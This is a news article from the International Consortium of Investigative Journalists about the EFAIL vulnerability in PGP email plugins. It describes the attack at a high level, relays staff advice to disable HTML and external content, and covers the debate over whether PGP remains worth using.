At the International Consortium of Investigative Journalists, we rely on PGP encryption every day to secure our sensitive communications and data. So, it caught our attention when security researchers in Germany found vulnerabilities with specific implementations of PGP that they dubbed EFAIL.
Pretty Good Privacy, or PGP, is an encryption software developed in 1991 by Philip Zimmermann as a human rights tool for sending secure messages or files over the internet. Following PGP’s release, Zimmermann was targeted by the U.S. government for distributing cryptographic software across borders, but the case was dropped in 1996.
There are very few alternative encryption methods for email that are as effective as PGP.
PGP works by assigning each user a randomly-generated public key and a private key that are unique and unreadable. To send someone data using PGP, the recipient must have access to your public key.
Data comes in many forms, from emails that use Internet Message Access Protocol (IMAP) to be transmitted over the internet, to videos and other large files that can be shared using File Transfer Protocol, or FTP. When a user wants to send these files, PGP uses the receiver’s public key to encrypt or lock the data. The data is secure during transmission and can’t be accessed. Then the receiver uses a personal private key to decrypt (or unlock) the data.
The EFAIL vulnerability isn’t a problem with the PGP protocol itself; instead it concerns the systems that automate the decryption process for users.
University of Münster researchers found the plaintext of the encrypted emails was vulnerable to attackers when combined with HTML content in an email. The plaintext could be siphoned out through hyperlinks connected to the internet and exfiltrated, or transferred without the owner’s permission.
“The attacker changes an encrypted email in a particular way and sends this changed encrypted email to the victim,” the EFAIL researchers explain. “The victim’s email client decrypts the email and loads any external content, thus exfiltrating the plaintext to the attacker.”
Common add-ons used to enable PGP encryption with email clients like Apple Mail and Mozilla Thunderbird were vulnerable to this type of attack, but most major tools have now patched these vulnerabilities and just require the user to update the software to complete protection.
Pierre Romera, the chief technology officer at ICIJ, sent out a warning to ICIJ staff and members as soon as the vulnerability was made public. His primary recommendation was simple:
“Having HTML enabled in PGP email is not a good idea, and that’s why the first step to make sure you’re not exposed to any risk or attack, is to deactivate HTML in your email and deactivate external content.”
But the discovery of EFAIL exacerbated concerns over the 27-year-old PGP protocol. In May, Wired UK declared “PGP is dead” in a piece criticizing its age and user-unfriendliness. The Electronic Frontier Foundation, or EFF, suggested readers use “alternative end-to-end secure channels, such as Signal, and temporarily stop sending and especially reading PGP-encrypted email.”
Zimmermann held his ground in the face of the unease worming through tech circles. Alongside the founders of ProtonMail, Mailvelope and Enigmail, the cryptographer took aim at EFF in particular:
“EFF recommended that users disable PGP plugins or stop using PGP altogether. This is akin to saying, ‘Some locks can be broken; therefore we must remove all doors.'”
ICIJ’s tech director appears cautious but confident in PGP’s security. Romera said he doesn’t believe a messaging app like Signal or Whatsapp will replace the practicality of the email encryption tool.
“We’re not going to drop PGP for a very good reason; it’s the best way to ensure our [email] communications are safe,” Romera said.
“There are very few alternative encryption methods for email that are as effective as PGP.”